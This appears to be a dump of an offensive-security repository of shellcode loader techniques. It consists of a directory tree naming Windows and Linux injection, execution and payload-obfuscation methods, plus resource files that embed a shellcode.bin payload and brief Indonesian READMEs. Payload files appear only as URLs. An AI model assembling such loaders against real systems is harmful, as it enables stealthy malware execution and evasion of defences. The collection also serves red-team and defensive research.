├── windows ├── storage │ ├── resource │ │ ├── c++ │ │ │ ├── resources.h │ │ │ ├── resources.rc │ │ │ ├── resources.res │ │ │ └── shellcode.bin │ │ └── README.md │ ├── stack │ │ ├── dart │ │ │ └── pubspec.yaml │ │ ├── README.md │ │ ├── rust │ │ │ ├── plain-winapi │ │ │ │ └── Cargo.toml │ │ │ └── with-wrapper │ │ │ │ └── Cargo.toml │ │ ├── crystal │ │ │ └── code.cr │ │ └── nim │ │ │ └── code.nim │ ├── global │ │ └── README.md │ ├── section │ │ ├── rust │ │ │ └── Cargo.toml │ │ ├── README.md │ │ └── c++ │ │ │ └── code.cpp │ └── README.md ├── execution │ ├── callback │ │ ├── EnumResourceLanguages │ │ │ ├── c++ │ │ │ │ ├── resources.h │ │ │ │ └── resources.rc │ │ │ └── README.md │ │ ├── EnumResourceTypes │ │ │ ├── c++ │ │ │ │ └── resource-self │ │ │ │ │ ├── resources.h │ │ │ │ │ ├── resources.rc │ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── EnumResourceTypesEx │ │ │ ├── c++ │ │ │ │ └── resource-self │ │ │ │ │ ├── resources.h │ │ │ │ │ ├── resources.rc │ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── EnumResourceNames │ │ │ ├── c++ │ │ │ │ └── resource-self │ │ │ │ │ ├── resources.h │ │ │ │ │ ├── shellcode.bin │ │ │ │ │ └── resources.rc │ │ │ └── README.md │ │ ├── EnumResourceNamesEx │ │ │ ├── c++ │ │ │ │ └── resource-self │ │ │ │ │ ├── resources.h │ │ │ │ │ ├── shellcode.bin │ │ │ │ │ └── resources.rc │ │ │ └── README.md │ │ ├── EnumWindows │ │ │ └── README.md │ │ ├── EnumObjects │ │ │ └── README.md │ │ ├── LdrpCallInitRoutine │ │ │ └── README.md │ │ ├── LineDDA │ │ │ └── README.md │ │ ├── EnumMetaFile │ │ │ └── README.md │ │ ├── EnumPwrSchemes │ │ │ └── README.md │ │ ├── EnumChildWindows │ │ │ └── README.md │ │ ├── EnumThreadWindows │ │ │ └── README.md │ │ ├── ImmEnumInputContext │ │ │ └── README.md │ │ ├── acmDriverEnum │ │ │ └── README.md │ │ ├── EnumDesktopWindows │ │ │ └── README.md │ │ ├── EnumSystemGeoID │ │ │ └── README.md │ │ ├── LdrEnumerateLoadedModules │ │ │ └── README.md │ │ ├── CopyFile2 │ │ │ └── README.md │ │ ├── DirectSoundEnumerate │ 
│ │ └── README.md │ │ ├── CryptEnumOIDInfo │ │ │ └── README.md │ │ ├── EnumDisplayMonitors │ │ │ └── README.md │ │ ├── EnumTimeFormatsEx │ │ │ └── README.md │ │ ├── InitOnceExecuteOnce │ │ │ └── README.md │ │ ├── PlaExtractCabinet │ │ │ └── README.md │ │ ├── DirectSoundCaptureEnumerate │ │ │ └── README.md │ │ ├── EnumSystemLocalesEx │ │ │ └── README.md │ │ ├── CertEnumSystemStore │ │ │ └── README.md │ │ ├── EnumDateFormatsExEx │ │ │ └── README.md │ │ ├── CertEnumPhysicalStore │ │ │ └── README.md │ │ ├── EnumerateLoadedModules │ │ │ └── README.md │ │ ├── README.md │ │ ├── FindDebugInfoFileEx │ │ │ └── README.md │ │ ├── CertEnumSystemStoreLocation │ │ │ └── README.md │ │ ├── ImageGetDigestStream │ │ │ └── README.md │ │ ├── FindExecutableImageEx │ │ │ └── README.md │ │ ├── CryptEnumOIDFunction │ │ │ └── README.md │ │ ├── EnumCalendarInfoExEx │ │ │ └── README.md │ │ ├── VerifierEnumerateResource │ │ │ └── README.md │ │ ├── waveInOpen │ │ │ └── README.md │ │ ├── waveOutOpen │ │ │ └── README.md │ │ ├── NotifyTeredoPortChange │ │ │ └── README.md │ │ ├── NotifyRouteChange2 │ │ │ └── README.md │ │ ├── PrintDlg │ │ │ └── README.md │ │ ├── ChooseFont │ │ │ └── README.md │ │ ├── CryptEnumKeyIdentifierProperties │ │ │ └── README.md │ │ ├── EnumDesktops │ │ │ └── README.md │ │ ├── EnumPageFiles │ │ │ └── README.md │ │ ├── SHBrowseForFolder │ │ │ └── README.md │ │ ├── ChooseColor │ │ │ └── README.md │ │ ├── PageSetupDlg │ │ │ └── README.md │ │ ├── EnumSystemLanguageGroups │ │ │ └── README.md │ │ ├── EnumWindowStations │ │ │ └── README.md │ │ ├── NotifyUnicastIpAddressChange │ │ │ └── README.md │ │ ├── EnumSystemLocales │ │ │ └── README.md │ │ ├── EnumDateFormats │ │ │ └── README.md │ │ ├── EnumTimeFormats │ │ │ └── README.md │ │ ├── mmioInstallIOProc │ │ │ └── README.md │ │ ├── EnumSystemCodePages │ │ │ └── README.md │ │ ├── SymEnumProcesses │ │ │ └── README.md │ │ ├── CallWindowProc │ │ │ └── README.md │ │ ├── EnumDateFormatsEx │ │ │ └── README.md │ │ ├── EnumUILanguages │ │ │ 
└── README.md │ │ ├── NotifyIpInterfaceChange │ │ │ └── README.md │ │ ├── PropertySheet │ │ │ └── README.md │ │ ├── EnumCalendarInfo │ │ │ └── README.md │ │ ├── EnumCalendarInfoEx │ │ │ └── README.md │ │ ├── DrawState │ │ │ └── README.md │ │ ├── GrayString │ │ │ └── README.md │ │ ├── mciSetYieldProc │ │ │ └── README.md │ │ ├── EnumFonts │ │ │ └── README.md │ │ ├── CryptVerifyMessageSignature │ │ │ └── README.md │ │ ├── DPA_DestroyCallback │ │ │ └── README.md │ │ ├── CopyFileEx │ │ │ └── README.md │ │ ├── DSA_DestroyCallback │ │ │ └── README.md │ │ ├── SymFindFileInPath │ │ │ └── README.md │ │ ├── EnumFontFamilies │ │ │ └── README.md │ │ ├── CreatePropertySheetPage │ │ │ └── README.md │ │ ├── EnumLanguageGroupLocales │ │ │ └── README.md │ │ ├── DialogBoxIndirectParam │ │ │ └── README.md │ │ ├── GetOpenFileName │ │ │ └── README.md │ │ ├── GetSaveFileName │ │ │ └── README.md │ │ ├── EnumFontFamiliesEx │ │ │ └── README.md │ │ ├── SetWinEventHook │ │ │ └── README.md │ │ ├── CryptDecodeMessage │ │ │ └── README.md │ │ ├── DPA_EnumCallback │ │ │ └── README.md │ │ ├── DSA_EnumCallback │ │ │ └── README.md │ │ ├── SendMessageCallback │ │ │ └── README.md │ │ ├── EnumDirTree │ │ │ └── README.md │ │ ├── WsPullBytes │ │ │ └── README.md │ │ ├── WsPushBytes │ │ │ └── README.md │ │ ├── MappingRecognizeText │ │ │ └── README.md │ │ ├── ReadFileEx │ │ │ └── README.md │ │ ├── WriteFileEx │ │ │ └── README.md │ │ ├── CertFindChainInStore │ │ │ └── README.md │ │ ├── EnumerateLoadedModulesEx │ │ │ └── README.md │ │ ├── CryptInstallOIDFunctionAddress │ │ │ └── README.md │ │ └── EnumProps │ │ │ └── README.md │ ├── event │ │ ├── README.md │ │ ├── SetTimer │ │ │ └── README.md │ │ ├── QueueUserAPC │ │ │ └── README.md │ │ ├── NtQueueApcThreadEx │ │ │ └── README.md │ │ ├── NtQueueApcThread │ │ │ └── README.md │ │ ├── RegisterWaitForSingleObject │ │ │ └── README.md │ │ ├── timeSetEvent │ │ │ └── README.md │ │ ├── CreateThreadpoolWait │ │ │ └── README.md │ │ └── CreateThreadpoolTimer │ │ │ └── 
README.md │ ├── asm-jmp │ │ ├── README.md │ │ └── rust │ │ │ └── Cargo.toml │ ├── exception │ │ ├── seh-catch-exception │ │ │ └── README.md │ │ ├── SetUnhandledExceptionFilter │ │ │ └── README.md │ │ └── AddVectoredExceptionHandler │ │ │ └── README.md │ ├── invoke │ │ ├── README.md │ │ ├── rust │ │ │ └── with-mmap │ │ │ │ ├── Cargo.toml │ │ │ │ └── src │ │ │ │ └── main.rs │ │ └── nim │ │ │ └── code.nim │ ├── thread │ │ ├── CreateRemoteThread │ │ │ ├── rust │ │ │ │ ├── with-windows-sys │ │ │ │ │ └── Cargo.toml │ │ │ │ └── with-winapi │ │ │ │ │ └── Cargo.toml │ │ │ └── README.md │ │ ├── CreateThread │ │ │ ├── rust │ │ │ │ └── Cargo.toml │ │ │ └── README.md │ │ ├── TpSimpleTryPost │ │ │ └── README.md │ │ ├── tls-callback │ │ │ └── README.md │ │ ├── SHCreateThread │ │ │ └── README.md │ │ ├── README.md │ │ ├── TrySubmitThreadpoolCallback │ │ │ └── README.md │ │ ├── SHCreateThreadWithHandle │ │ │ └── README.md │ │ ├── EtwpCreateEtwThread │ │ │ └── README.md │ │ ├── CreateThreadpoolWork │ │ │ └── README.md │ │ ├── NtCreateThreadEx │ │ │ └── README.md │ │ ├── RtlCreateUserThread │ │ │ └── README.md │ │ └── CreateRemoteThreadEx │ │ │ └── README.md │ ├── fiber │ │ ├── CreateFiber │ │ │ ├── rust │ │ │ │ └── Cargo.toml │ │ │ └── README.md │ │ ├── README.md │ │ ├── CreateFiberEx │ │ │ └── README.md │ │ ├── FlsAlloc │ │ │ └── README.md │ │ └── RtlUserFiberStart │ │ │ └── README.md │ └── README.md ├── writing │ ├── custom │ │ ├── bit-swap │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── feistel │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── xor-lfsr │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── xor-pair │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── bit-inverse │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── printable │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ 
│ └── README.md │ │ ├── xor-chain │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── bit-crossover │ │ │ └── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ ├── bit-rotation │ │ │ └── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ ├── xor-multikey │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── xor-singlekey │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── padding-dynamic │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ └── xor-singlekey-ctr │ │ │ ├── c++ │ │ │ ├── shellcode.bin │ │ │ └── generate.py │ │ │ └── README.md │ ├── permutation │ │ ├── snake │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── spiral │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── rail-fence │ │ │ ├── c++ │ │ │ │ ├── shellcode.bin │ │ │ │ └── generate.py │ │ │ └── README.md │ │ ├── fisher-yates │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── row-ordering │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── column-ordering │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ └── README.md │ ├── encryption │ │ ├── block │ │ │ ├── des │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── lea │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── tea │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── 3-way │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── anubis │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── clefia │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── khazad │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── khufu │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── mars │ │ │ │ ├── c++ │ │ │ │ │ 
└── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── safer │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── xtea │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── blowfish │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── camellia │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── lucifer │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── treyfer │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── hierocrypt3 │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ ├── aes │ │ │ │ └── CryptDecrypt │ │ │ │ │ └── c++ │ │ │ │ │ └── shellcode.bin │ │ │ ├── cipherunicorn-a │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ └── README.md │ │ │ └── README.md │ │ ├── stream │ │ │ ├── rc4 │ │ │ │ └── SystemFunction │ │ │ │ │ ├── c++ │ │ │ │ │ └── shellcode.bin │ │ │ │ │ └── README.md │ │ │ └── README.md │ │ └── README.md │ ├── substitution │ │ ├── atbash │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── hill-cipher │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ └── affine-cipher │ │ │ ├── c++ │ │ │ └── shellcode.bin │ │ │ └── README.md │ ├── compression │ │ └── Decompress │ │ │ └── c++ │ │ │ └── shellcode.bin │ ├── conversion │ │ ├── endianness │ │ │ ├── c++ │ │ │ │ └── shellcode.bin │ │ │ └── README.md │ │ ├── UuidFromString │ │ │ └── c++ │ │ │ │ └── shellcode.bin │ │ ├── RtlIpv4StringToAddress │ │ │ └── c++ │ │ │ │ └── shellcode.bin │ │ ├── RtlIpv6StringToAddress │ │ │ └── c++ │ │ │ │ └── shellcode.bin │ │ ├── RtlIpv4StringToAddressEx │ │ │ └── c++ │ │ │ │ └── shellcode.bin │ │ ├── RtlEthernetStringToAddress │ │ │ └── c++ │ │ │ │ └── shellcode.bin │ │ └── README.md │ ├── misc │ │ └── rust │ │ │ └── memmap2 │ │ │ ├── README.md │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ └── main.rs │ ├── copy │ │ ├── memcpy │ │ │ └── README.md │ │ ├── RtlMoveMemory │ │ │ └── README.md │ │ ├── 
CopyMemory │ │ │ └── README.md │ │ ├── MoveMemory │ │ │ └── README.md │ │ ├── WriteProcessMemory │ │ │ └── README.md │ │ ├── NtWriteVirtualMemory │ │ │ └── README.md │ │ └── CreatePipe │ │ │ └── README.md │ └── README.md ├── permission │ ├── VirtualProtect │ │ └── README.md │ ├── README.md │ ├── VirtualProtectEx │ │ └── README.md │ └── NtProtectVirtualMemory │ │ └── README.md └── allocation │ ├── AllocADsMem │ └── README.md │ ├── CoTaskMemAlloc │ └── README.md │ ├── GlobalAlloc-GPTR │ └── README.md │ ├── VirtualAlloc │ └── README.md │ ├── GlobalAlloc-GHND │ └── README.md │ ├── VirtualAllocEx │ └── README.md │ ├── VirtualAlloc2 │ └── README.md │ ├── README.md │ ├── HeapAlloc │ └── README.md │ ├── RtlAllocateHeap │ └── README.md │ └── NtAllocateVirtualMemory │ └── README.md └── linux ├── execution ├── event │ ├── README.md │ ├── signal │ │ └── README.md │ ├── sigaction │ │ └── README.md │ ├── atexit │ │ └── README.md │ └── pthread_atfork │ │ └── README.md ├── invoke │ └── README.md ├── thread │ ├── README.md │ ├── clone │ │ └── README.md │ └── pthread_create │ │ └── README.md ├── callback │ ├── README.md │ ├── ftw │ │ └── README.md │ ├── nftw │ │ └── README.md │ ├── qsort │ │ └── README.md │ ├── bsearch │ │ └── README.md │ ├── scandir │ │ └── README.md │ └── fts_open │ │ └── README.md └── README.md ├── storage ├── stack │ └── README.md └── README.md ├── allocation ├── README.md ├── mmap │ └── README.md ├── shmat │ └── README.md ├── posix_memalign │ └── README.md ├── pvalloc │ └── README.md ├── memalign │ └── README.md └── valloc │ └── README.md ├── permission └── README.md └── writing └── README.md /windows/storage/resource/c++/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceLanguages/c++/resources.h: 
-------------------------------------------------------------------------------- 1 | #define REVID_STRING 1 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /linux/execution/event/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode berdasarkan event tertentu. 
-------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNames/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | #define ID_STRING 101 3 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | #define ID_STRING 101 3 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/execution/event/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode berdasarkan event tertentu. 
6 | -------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/storage/resource/c++/resources.res -------------------------------------------------------------------------------- /windows/storage/resource/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/storage/resource/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/execution/asm-jmp/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode dengan menuju langsung (jump) ke alamat shellcode. 
-------------------------------------------------------------------------------- /windows/execution/callback/EnumResourceLanguages/c++/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | STRINGTABLE 4 | BEGIN 5 | REVID_STRING, "ReversingID" 6 | END -------------------------------------------------------------------------------- /windows/writing/custom/bit-swap/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-swap/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/feistel/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/feistel/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-lfsr/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-lfsr/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-pair/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-pair/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/bit-inverse/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-inverse/c++/shellcode.bin 
-------------------------------------------------------------------------------- /windows/writing/custom/printable/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/printable/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-chain/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-chain/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/snake/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/snake/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/spiral/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/spiral/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/bit-crossover/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-crossover/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/bit-rotation/c++/shellcode.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-rotation/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-multikey/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-multikey/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-singlekey/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/des/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/des/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/lea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/lea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/tea/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/tea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/atbash/c++/shellcode.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/atbash/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/compression/Decompress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/compression/Decompress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/endianness/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/endianness/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/padding-dynamic/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/padding-dynamic/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/3-way/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/3-way/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/anubis/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/anubis/c++/shellcode.bin 
-------------------------------------------------------------------------------- /windows/writing/encryption/block/clefia/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/clefia/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khazad/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/khazad/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/khufu/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/khufu/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/mars/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/mars/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/safer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/safer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/xtea/c++/shellcode.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/xtea/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/rail-fence/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/rail-fence/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/UuidFromString/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/UuidFromString/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/blowfish/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/blowfish/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/camellia/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/camellia/c++/shellcode.bin -------------------------------------------------------------------------------- 
/windows/writing/encryption/block/lucifer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/lucifer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/treyfer/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/treyfer/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/fisher-yates/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/fisher-yates/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/permutation/row-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/row-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/hill-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/hill-cipher/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/hierocrypt3/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/misc/rust/memmap2/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Alokasi area memory dan ubah permissions dengan [memmap2](https://crates.io/crates/memmap2). -------------------------------------------------------------------------------- /windows/writing/permutation/column-ordering/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/column-ordering/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/substitution/affine-cipher/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/affine-cipher/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- 